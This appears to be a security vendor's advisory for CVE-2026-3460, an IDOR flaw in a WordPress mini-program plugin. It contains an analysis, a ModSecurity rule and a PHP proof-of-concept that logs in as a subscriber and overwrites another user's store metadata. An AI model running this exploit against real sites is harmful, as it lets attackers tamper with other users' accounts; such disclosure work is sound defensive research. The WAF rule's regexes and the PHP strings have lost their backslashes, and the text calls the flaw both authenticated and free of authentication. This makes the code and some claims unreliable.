Atomic Edge analysis of CVE-2026-3460 (metadata-based):
The REST API TO MiniProgram WordPress plugin contains an Insecure Direct Object Reference vulnerability in all versions up to 5.1.2. This vulnerability allows authenticated attackers with Subscriber-level permissions to modify arbitrary users’ store-related metadata via a REST API endpoint. The CVSS 5.3 score reflects a moderate integrity impact with no authentication requirements for the attack.
Atomic Edge research identifies the root cause as improper input validation (CWE-20) in the plugin’s REST API permission checking logic. The vulnerability description confirms that the permission callback function `update_user_wechatshop_info_permissions_check` validates only the `openid` parameter against existing WordPress users. The actual data modification function `update_user_wechatshop_info` then uses a separate `userid` parameter without verifying it corresponds to the same user authenticated by the `openid`. This creates an authorization bypass where attackers can supply any valid `userid` while providing their own `openid`.
Exploitation requires an authenticated WordPress user account with at least Subscriber privileges. Attackers would target the plugin’s REST API endpoint, likely at `/wp-json/rest-api-to-miniprogram/v1/update_user_wechatshop_info` based on standard WordPress REST API naming conventions. The attack payload includes two parameters: a legitimate `openid` value belonging to the attacker’s account and a manipulated `userid` parameter targeting the victim account. The request would also contain the store metadata fields (`storeinfo`, `storeappid`, `storename`) to overwrite on the victim’s account.
Remediation requires implementing proper authorization checks that verify the relationship between the authenticated user and the target resource. The permission callback should validate that the `userid` parameter corresponds to the same user authenticated by the `openid` parameter. This can be achieved by comparing user IDs or implementing capability checks like `current_user_can(‘edit_user’, $userid)`. The plugin should also implement strict type validation on the `userid` parameter to prevent injection attacks.
The impact of successful exploitation allows attackers to modify store-related metadata for any WordPress user. While the description specifies store metadata fields, Atomic Edge analysis notes that similar vulnerabilities often extend to other user metadata if the same flawed pattern exists elsewhere in the plugin. This could enable business disruption, impersonation attacks, or preparation for further attacks by modifying application-specific configuration data. The vulnerability does not directly enable privilege escalation or remote code execution based on the available metadata.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-3460 (metadata-based)
# This rule blocks exploitation of the IDOR vulnerability in REST API TO MiniProgram plugin
# by detecting mismatched 'openid' and 'userid' parameters in REST API requests
SecRule REQUEST_URI "@rx ^/wp-json/rest-api-to-miniprogram/v[0-9]+/update_user_wechatshop_info"
"id:20263460,phase:2,deny,status:403,chain,msg:'CVE-2026-3460: IDOR via userid parameter in REST API TO MiniProgram plugin',severity:'CRITICAL',tag:'CVE-2026-3460',tag:'WordPress',tag:'Plugin',tag:'REST-API-TO-MiniProgram',tag:'IDOR'"
SecRule REQUEST_METHOD "@streq POST" "chain"
SecRule REQUEST_HEADERS:Content-Type "@contains application/json" "chain"
SecRule REQUEST_BODY "@rx "userid"s*:s*(d+)"
"capture,setvar:'tx.target_userid=%{tx.1}',chain"
SecRule REQUEST_BODY "@rx "openid"s*:s*"([^"]+)""
"capture,setvar:'tx.openid=%{tx.1}',chain"
SecRule &TX:target_userid "@eq 1" "chain"
SecRule &TX:openid "@eq 1" "chain"
SecRule TX:target_userid "@rx ^[0-9]+$" "chain"
SecRule TX:openid "@rx ^[a-zA-Z0-9_-]+$"
"t:none,setvar:'tx.idor_attempt=1',logdata:'Matched openid: %{tx.openid} and userid: %{tx.target_userid}'"
# Note: This rule detects the presence of both parameters but cannot validate their relationship
# without user session context. In production, this should be combined with session tracking
# to verify the openid belongs to the same user as the userid parameter.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-3460 - REST API TO MiniProgram <= 5.1.2 - Authenticated (Subscriber+) Insecure Direct Object Reference via 'userid' REST API Parameter
<?php
/**
* Proof of Concept for CVE-2026-3460
* Assumptions based on vulnerability description:
* 1. REST endpoint exists at /wp-json/rest-api-to-miniprogram/v1/update_user_wechatshop_info
* 2. Requires authentication via WordPress cookies or nonce
* 3. Accepts POST requests with 'openid', 'userid', and store metadata parameters
* 4. 'openid' must correspond to an existing WordPress user
* 5. 'userid' is not validated against the authenticated user
*/
$target_url = 'https://example.com';
// Configuration - modify these values for testing
$username = 'attacker_subscriber';
$password = 'attacker_password';
$victim_userid = 1; // Target user ID (e.g., administrator)
$attacker_openid = 'valid_openid_for_attacker'; // Must be valid for the attacker account
// Step 1: Authenticate to WordPress to obtain cookies
$login_url = $target_url . '/wp-login.php';
$cookie_file = tempnam(sys_get_temp_dir(), 'cve_2026_3460');
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $login_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query([
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => '1'
]),
CURLOPT_COOKIEJAR => $cookie_file,
CURLOPT_COOKIEFILE => $cookie_file,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_SSL_VERIFYPEER => false
]);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if ($http_code !== 200) {
echo "Authentication failed. HTTP code: $http_coden";
unlink($cookie_file);
exit(1);
}
// Step 2: Exploit the IDOR vulnerability
$exploit_url = $target_url . '/wp-json/rest-api-to-miniprogram/v1/update_user_wechatshop_info';
$payload = [
'openid' => $attacker_openid, // Legitimate openid for attacker
'userid' => $victim_userid, // Arbitrary user ID to target
'storeinfo' => 'Atomic Edge PoC Modified Store Info',
'storeappid' => 'hacked_app_id',
'storename' => 'Compromised Store Name'
];
curl_setopt_array($ch, [
CURLOPT_URL => $exploit_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => json_encode($payload),
CURLOPT_HTTPHEADER => [
'Content-Type: application/json',
'Accept: application/json'
],
CURLOPT_RETURNTRANSFER => true,
CURLOPT_COOKIEFILE => $cookie_file
]);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo "Exploit attempt completed.n";
echo "HTTP Status: $http_coden";
echo "Response: $responsen";
// Cleanup
curl_close($ch);
unlink($cookie_file);
?>
